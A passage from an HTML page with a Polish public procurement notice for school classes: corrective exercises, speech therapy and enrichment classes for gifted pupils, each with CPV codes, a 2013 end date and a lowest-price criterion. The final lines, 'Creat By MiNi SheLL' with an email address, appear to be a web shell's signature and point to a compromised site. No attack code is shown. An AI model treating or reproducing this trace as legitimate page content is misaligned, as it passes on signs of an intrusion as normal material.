4)	Dobór pozycji wyjściowych do ćwiczeń w poszczególnych wadach.
5)	Ćwiczenia rozluźniające i zwiększające ruchomość w stawach: 
-	obręczy barkowej,
-	obręczy biodrowej,
-	kończyn dolnych i stóp.
6)	Nauka prawidłowego oddychania:
-	 torem piersiowym, brzusznym, 
-	ćwiczenia oddechowe wolne, wspomagane i oporowe. 
7)	Wyrabianie wytrwałości posturalnej, kształtowanie odruchu postawy prawidłowej.
8)	Nauka, doskonalenie i kontrola ćwiczeń domowych.
9)	Rozciąganie grup mięśniowych przykurczonych i wzmacnianie osłabionych np. głowy, szyi, obręczy barkowej, górnego odcinka mięśni grzbietu, brzucha, kończyn dolnych i stóp, klatki piersiowej.
10)	Ćwiczenia o zwiększonej intensywności :mięśni grzbietu, brzucha, pośladkowych( tempo, ilość powtórzeń, obciążenia)
11)	Gry i zabawy ruchowe mające na celu harmonijny rozwój organizmu oraz wzmożenie jego wydolności i sprawności fizyczno- ruchowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie     Nr 4 -  Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 150 godzin; OPIS: Cel zajęć: poprawa sprawności motorycznej narządów mowy, wywołanie zaburzonych głosek oraz ich utrwalenie w mowie i piśmie, poprzez ćwiczenia wspomagające rozwój mowy, czytania i pisania oraz kompetencji językowych, poznawanie części mowy, rozwijanie spostrzegania i różnicowania słuchowego.
Program z logopedii przeznaczony jest dla dzieci, które mają wadę wymowy.. Zajęcia logopedyczne są środkiem pomocy dziecku. Ich treść, formy, metody muszą być maksymalnie dostosowane do indywidualnych potrzeb i możliwości dziecka oraz skierowane na wyeliminowanie wykrytych w mowie nieprawidłowości.
W pracy z dzieckiem wychodzi się od treści znanych i łatwych. Podstawową pracy są ćwiczenia w formie zabaw i gier. W terapii rzadko stosuje się tylko jeden rodzaj metod. Wynika to z konieczności realizowania zasady kompleksowych oddziaływań. Wybór metod zawsze uwarunkowany jest rodzajem zaburzenia.
Metody pracy: ćwiczenia oddechowe, ćwiczenia narządów artykulacyjnych: języka, warg, podniebienia miękkiego, żuchwy, ćwiczenia emisyjno - głosowe, ćwiczenia właściwe z zakresu korekcji wad wymowy, ćwiczenia wspomagające terapię logopedyczną, ćwiczenia stymulujące rozwój słuchu fonematycznego, ćwiczenia i zabawy z muzyką - logorytmika, ćwiczenia stymulujące ogólny rozwój dziecka.
Rekrutacja:
Do programu wybrane będą dzieci, które mają wadę wymowy. Kwalifikowanie dzieci do zajęć logopedycznych będzie odbywało się po konsultacji z wychowawcą, zapoznaniu się z orzeczeniami psychologiczno -pedagogicznymi lub wynikami badań specjalistycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie  Nr 5 -  Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych - 150 godzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych - 150 godzin; OPIS: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych.
Cel zajęć: wzrost umiejętności rozwiązywania przez uczniów złożonych zadań matematycznych, pobudzanie ich aktywności twórczej, rozwijanie logicznego i matematycznego myślenia, poszerzanie pojęć i wiadomości przyrodniczych, nauka obserwowania zjawisk przyrodniczych poprzez wykonywanie doświadczeń i eksperymentów. Program matematyczno-przyrodniczy dla dzieci zdolnych To nie takie trudne - potrafię więcej.
Powyższy program obejmuje następujące treści: orientacja w przestrzeni, cechy wielkościowe, jednostki miar, obliczenia pieniężne, treści geometryczne, działania na zbiorach i liczbach,
w zakresie edukacji środowiskowej: Przyroda wokół nas , rozpoznawanie i nazywanie roślin zielnych, drzew, krzewów, obserwacja zmian w przyrodzie w zależności od pory roku, odróżnianie owadów, ptaków, ssaków (występujących w Polsce i egzotycznych) ich budowy, trybu życia i odżywiania się, w zakresie Nasza miejscowość: opisywanie swojej miejscowości, jej zabytków, pomników, miejsc pamięci narodowej, typowych zawodów mieszkańców miejscowości
Metody pracy dostosowane będą do celów i treści zadań: metody aktywizujące: integracyjne, twórczego rozwiązywania problemów, pracy we współpracy, metody słowne, oglądowe, obserwacji i praktycznego działaniach
Rekrutacja:
Do programu wybrane będą dzieci, które wykazują się wiedzą i zainteresowaniami matematyczno-przyrodniczymi. Udział w tym programie pozwoli im na rozwijanie osobowości, realizowanie własnych pragnień, zainteresowań.
Program zajęć dla uczniów uzdolnionych matematycznie i przyrodniczo ma obejmować rozwiązywanie złożonych zadań tekstowych, gry i zabawy matematyczno - logiczne, doświadczenia i obserwacje dotyczące świata zwierząt i roślin, ekologii, zdrowia i higieny.
Został opracowany z myślą o uczniach, którzy nie boja się rozwiązywania problemów oraz cieszą się z każdego sukcesu.
Metody pracy zależne będą od celów, treści i zadań dydaktycznych. Można je sklasyfikować następująco:
-	ze względu na źródło wiedzy: słowne, oglądowe, praktyczne,
-	ze względu na funkcje: metoda utrwalania, kontroli i oceny,
-	ze względu na sposoby uczenia: podające, problemowo - poszukujące i ekspresyjne.
Dominującą rolę odgrywać będą metody aktywizujące uczniów.
Wyposażenie będzie zgodne z potrzebami uczniów i uczennic. Do szkoły zakupione zostaną: programy wspomagające profilaktykę, diagnozę, terapię pedagogiczną dzieci z trudnościami w nauce pisania i czytania oraz zagrożonych dysleksją; multimedialne programy wspomagające diagnozę i terapię logopedyczną. Ponadto szkoła zostanie wyposażona w plansze, tablice i zestawy do ćwiczeń, gry dydaktyczne, puzzle, układanki, domina. Szkoła doposaży swoją bazę dydaktyczną w sprzęt specjalistyczny (specjalistyczne oprogramowanie, pakiety do diagnozowania i korygowania dysfunkcji i dysharmonii rozwojowych, takich jak: wady wymowy, dysleksja). Zakupione materiały dydaktyczne i sprzęt będą również służyć kształtowaniu w uczniach i uczennicach poczucia równości i zostaną wykorzystane w nauczaniu niestereotypowego postrzegania ról kobiecych i męskich w społeczeństwie. Poprzez realizację tego działania osiągnięty zostanie Standard nr IV opisany w Zasadach przygotowania, realizacji i rozliczania projektów systemowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com